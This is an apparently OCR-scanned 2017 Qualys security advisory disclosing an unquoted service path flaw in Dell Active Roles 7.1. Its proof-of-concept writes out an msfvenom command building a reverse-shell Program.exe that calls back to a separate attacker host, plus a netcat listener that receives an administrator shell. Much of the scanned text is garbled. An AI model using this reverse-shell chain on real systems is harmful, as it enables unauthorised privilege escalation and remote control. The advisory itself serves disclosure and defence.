Qualys Security Advisory QSA-2017-06-16 


Friday 16, 2017 


Dell Active Roles 7.x Unquoted Search Path Vulnerability 


SYNOPSIS: 


Dell Active Roles 7.1 uses a search path that contains an unquoted element, in which the element contains 
whitespace or other separators. This can cause the product to access resources in a parent path. 


Reference:- https://www.oneidentity.com/products/active-roles 


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target: Dell ActiveRoles 7.1.2.3406 
2. Target IP Address: 10.113.14.112 


Vulnerable/Tested Version: 


Dell Active Roles 7.1.x running on Windows Server 2012. Older versions may also be affected. 


Panel » Programs » Programs and Features vC 


Uninstall or change a program 


To uninstall a program, select it from the list and then click Uninstall, Change, or Repair. 


Organize + — Uninstall/Change 


^ 


Name Publisher Installed On Size Version 

[9] Dell Active Roles 7.1 Dell Software Inc. 6/15/2017 231MB 7.1.2,3406 
[3 Microsoft ODBC Driver 11 for SQL Server Microsoft Corporation 6/15/2017 4.61 MB 12.0.2000.8 
(3j Microsoft SQL Server 2008 Setup Support Files Microsoft Corporation 6/15/2017 38.9MB 10.3.5500.0 
Microsoft SQL Server 2012 Native Client Microsoft Corporation 6/15/2017 9.68MB 11.1.3000.0 


Vulnerability: Unquoted Search Path Vulnerability 


The 'Active Roles Administration Service’ uses a search path that contains an unquoted element, in which 
the element contains whitespace or other separators. This can cause the product to access resources in a 
parent path. 


Active Roles Administration Service Name = Description Status Startup Type Log On As 
ZŠ Active Directory Domain Services ADDSDom... Running Automatic Local System 
Stop the service Ch Active Directory Web Services This service... Running Automatic Local System 
Restart the service Active Roles Administration Service Active Roles... Running Automatic ACTIVEROLES\Administrator 
C Application Experience Processes a... Manual (Trig... Local System 
Description: i1 Application Host Helper Service Provides ad... Running Automatic Local System 
Active Roles component that C Application Identity Determines ... Manual (Trig... Local Service 
ae, qo A Application Information Facilitates t.. Running Manual Local System 
policies and conventions. Sh Application Layer Gateway Service Provides su... Manual Local Service 
‘G4 Application Management Processes in... Manual Local System 


Service name: ARAdminSvc 


Display name: Active Roles Administration Service 

Description: ive Roles component that responds to client A 
i s, performs administrative tasks, and m 

Path to executable: 


7.1\Service \arssvc.exe 


C:\Program Files\Dell\Active Roles 


Startup type: Automatic v 


Help me configure service startup options. 


Service status: Running 


Start Pause Resume 


Risk Factor: High 


Impact: 


If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a 
file as "C:\Program.exe" to be run by a privileged program making use of WinExec. 


CVSS Score: AV: L/AC: L/AU: S/C:C/I: C/A:C 


Proof-Of-Concept: 


1. Log into the target with a low privileged account which has access to the file system. 


Command Prompt 


>>\Users\testuser>net user 

ser name - 

ull Name Test User 

‚omment 

ser’s comment 

ountry/region code (System Default»? 
lecount active 2s 

ccount expires Never 


'assuord last set 6/16/2817 12:23:31 AM 
Y ¡word expires Never 

¡rd changeable 671772817 12:23:31 AM 
assword required Yes 
Jser may change password No 


lorkstations allowed All 

ogon script 

Jser profile 

lome directory 

ast logon 6/17/2017 1:42:25 AM 


hours allowed All 
Group Menberships 
Group memberships "Domain Users 
[he command completed successfully. 
\testuser>ipconf ig 


lindows IP Configuration 


thernet adapter Etherneti: 


Connection-specific DNS Suffix .: 

Link-local IPu6 Address . . . . » : feB8B::90f3:9670:19c :2 
EUS GQOGPOOE: a: © aaa... 8S 20.113,10, 322 

Subnet Mask . s « 2 © © a © a o o + 29924209 1499.8 

Default Gateway... +. A O A 


thernet adapter Ethernet@: 


Create an executable file using MSFVenom. 


root@kali: ~/Desktop/DellActiveRoles eoo0 


File Edit View Search Terminal Help 
:-/Desktop/DellActiveRoles# msfvenom -p windows/x64/shell reverse tcp LHOST=10.113.14.125 LPORT-443 -f 
exe » Program.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the payload 
No Arch selected, selecting Arch: x64 from the payload 
No encoder or badchars specified, outputting raw payload 
Payload size: 460 bytes 
Final size of exe file: 7168 bytes 


:-/Desktop/DellActiveRoles# |} 


Copy this file to C:\ drive on the target machine. 


Application Tools 


Home Share View Manage e 
€) + T i » Computer » Local Disk (C:) € L Di Se | 
do Favorites Name Type Size 
BE Desktop ¿e inetpub File folder 
[$ Downloads Le PerfLogs File folder 
= Recent places Le Program Files File folder 


(A Libraries 
==] Documents 


a Music 


t| Pictures 


de Program Files (x86) 


di Users 
J Windows 


(1 Program.exe 


Application 7 KB 


4. Wait for System reboot or admin to restart Active Roles Administration Service. 


5. The target machine sends reverse shell after the reboot or when service is restarted. 


G:\>netstat —anbo 


TCP 16.113 .14.112 :64244 
UDP 6.6.6.6:55443 


i find "443" 


16.113 .14.125:443 


L3 


UDP 
UDP 
UDP 
UDP 


GEN? 


8.8.8.8:56443 
[::1:57443 
[::1:58443 
[::1:59443 


ESTABLISHED 


root@kali: ~/Desktop/DellActiveRoles ooo 


File Edit View Search Terminal Help 
TX errors 0 dropped O overruns O carrier O collisions 0 


root@kali:~/Desktop/DellActiveRoles# nc -nvlp 443 

istening on [any] 443 ... 

onnect to [10.113.14.125] from (UNKNOWN) [10.113.14.112] 64244 
Microsoft Windows [Version 6.2.9200] 

(c) 2012 Microsoft Corporation. All rights reserved. 


: \Windows\system32>whoami 
hoami 
activeroles\administrator 


:\Windows\system32>ipconfig 
ipconfig 


indows IP Configuration 


thernet adapter Ethernetl: 


Connection-specific DNS Suffix : 

Link-local IPv6 Address . . . . . : fe80::9cf3:9670:19c:29e4%22 
IPVA-Address. s u osii w a es 2 218 :113: 102112 

Subnet Mask a. © =a ade EIE er lere 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to research @ qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


